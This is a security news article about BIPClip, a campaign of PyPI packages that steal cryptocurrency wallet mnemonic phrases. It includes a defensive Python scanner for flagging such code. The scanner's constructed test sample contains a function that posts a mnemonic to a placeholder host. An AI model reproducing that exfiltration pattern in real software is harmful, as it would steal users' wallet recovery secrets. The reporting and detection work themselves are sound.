A group of threat hunters has uncovered a series of seven packages on the Python Package Index (PyPI) repository designed to pilfer BIP39 mnemonic phrases utilized for recovering private keys of cryptocurrency wallets.
ReversingLabs tracks the software supply chain campaign as BIPClip. The packages, which were removed from PyPI after being downloaded 7,451 times in total, include:
The BIPClip campaign, targeting developers engaged in cryptocurrency wallet security and generation projects, has been operational since at least December 4, 2022, with the initial publication of hashdecrypt on the registry.
Security researcher Karlo Zanki, in a report shared with The Hacker News, commented, “This is just the latest software supply chain campaign to target crypto assets.” Zanki emphasized that cryptocurrency remains a prime focus for threat actors exploiting the software supply chain.
To evade detection, the perpetrators behind the campaign crafted one of the packages, mnemonic_to_address, to appear benign: its only suspicious trait was listing bip39-mnemonic-decrypt as a dependency, and it was that dependency that contained the malicious code.
Zanki elaborated, “The imported module and invoked function names were deliberately chosen to resemble legitimate functions, minimizing suspicion, given that BIP39 standard implementations involve numerous cryptographic operations.”
The package’s primary function is to extract mnemonic phrases and transmit the data to a server controlled by the threat actor.
Additionally, two other packages identified by ReversingLabs, public-address-generator and erc20-scanner, function similarly by luring users to disclose mnemonic phrases to a common command-and-control (C2) server.
hashdecrypts, by contrast, does not rely on a separate dependency: it harvests the data on its own, with nearly identical code embedded directly in the package.
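The pattern described above, a package whose innocuously named helper both handles a mnemonic phrase and sends it to a remote server, is something a defender can triage statically. The following Python script is an added example written for this article, not ReversingLabs' tooling or any of the BIPClip packages: it parses a module with the standard `ast` library and flags any function that references wallet-recovery identifiers (mnemonic, seed, private key) and also makes an outbound network call. The two sample modules are constructed for the demonstration; the network-call list and identifier hints are assumptions to be extended for your own environment, and the URL is a placeholder.

```python
"""Static triage heuristic for PyPI packages that claim to implement BIP39
helpers: flag functions that touch secret recovery material AND perform
outbound network I/O. Added example for this article; the sample modules
below are constructed, not real package code."""
import ast
from typing import List, Tuple

# Substrings that suggest a function handles recovery secrets (assumed list).
SECRET_HINTS = ("mnemonic", "seed", "private_key", "privkey", "bip39")

# Dotted call names treated as outbound network traffic (assumed list).
NETWORK_CALLS = {
    "requests.post", "requests.get", "urllib.request.urlopen",
    "httpx.post", "httpx.get", "socket.connect",
}


def _dotted_name(node: ast.AST) -> str:
    """Rebuild 'a.b.c' from an Attribute/Name chain; '' if the chain does
    not bottom out in a plain Name (e.g. a call on a call result)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _mentions_secret(name: str) -> bool:
    lowered = name.lower()
    return any(hint in lowered for hint in SECRET_HINTS)


def scan_source(source: str) -> List[Tuple[str, str]]:
    """Return (function_name, network_call) pairs for every function that
    references a secret-like identifier and also makes a network call."""
    tree = ast.parse(source)
    findings: List[Tuple[str, str]] = []
    for fn in ast.walk(tree):
        if not isinstance(fn, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        touches_secret = False
        net_calls: List[str] = []
        for node in ast.walk(fn):
            # Parameters and plain names both count as "handles the secret".
            if isinstance(node, ast.arg) and _mentions_secret(node.arg):
                touches_secret = True
            elif isinstance(node, ast.Name) and _mentions_secret(node.id):
                touches_secret = True
            elif isinstance(node, ast.Call):
                callee = _dotted_name(node.func)
                if callee in NETWORK_CALLS:
                    net_calls.append(callee)
        if touches_secret and net_calls:
            findings.extend((fn.name, call) for call in net_calls)
    return findings


# Constructed sample: a "checksum" helper that also posts the phrase to a
# placeholder host. This mirrors the behaviour the article attributes to the
# campaign's packages; the host is deliberately unresolvable.
SUSPICIOUS_MODULE = '''
import hashlib
import requests

def verify_checksum(mnemonic):
    digest = hashlib.sha256(mnemonic.encode()).hexdigest()
    requests.post("https://example.invalid/collect", data={"m": mnemonic})
    return digest

def derive_address(mnemonic):
    return hashlib.sha256(mnemonic.encode()).hexdigest()[:40]
'''

# Constructed sample: handles a mnemonic but performs no network I/O.
BENIGN_MODULE = '''
import hashlib

def derive_address(mnemonic):
    return hashlib.sha256(mnemonic.encode()).hexdigest()[:40]
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_MODULE), ("benign", BENIGN_MODULE)):
        print(label, scan_source(src))
```

Run it over every `.py` file in a freshly downloaded wheel or sdist before installing, and treat a hit as a reason to read the function by hand rather than as proof of malice: a legitimate wallet tool may query a chain explorer in the same function that derives an address, which is exactly why the heuristic reports the call name alongside the function.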
The software supply chain security firm highlighted references to a GitHub profile under the name “HashSnake,” which promotes a repository named hCrypto as a tool for extracting mnemonic phrases from crypto wallets using the hashdecrypts package.
A detailed review of the repository’s commit history revealed that the campaign has been ongoing for over a year, as evidenced by a Python script that previously imported the hashdecrypt package (without the “s”) until March 1, 2024, coinciding with the upload of hashdecrypts to PyPI.
It’s noteworthy that the threat actors associated with the HashSnake account maintain a presence on Telegram and YouTube to promote their tools, including a video released on September 7, 2022, showcasing a crypto logs checker tool named xMultiChecker 2.0.
Zanki remarked, “The content of each package was meticulously crafted to minimize suspicion, with a clear focus on compromising crypto wallets and siphoning off the contained cryptocurrencies. This targeted approach reduced the likelihood of detection by security and monitoring tools in compromised organizations.”
These findings underscore the security risks inherent in open-source package repositories, exacerbated by the exploitation of legitimate platforms like GitHub to distribute malware.
Moreover, abandoned projects have become an attractive avenue for threat actors to hijack developer accounts and release trojanized versions, setting the stage for widespread supply chain attacks.
“Abandoned digital assets are not relics of the past; they are ticking time bombs, increasingly exploited by attackers to infiltrate open-source ecosystems,” as highlighted by Checkmarx in a recent report.
“The MavenGate and CocoaPods case studies illustrate how abandoned domains and subdomains can be compromised to deceive users and propagate malicious activities.”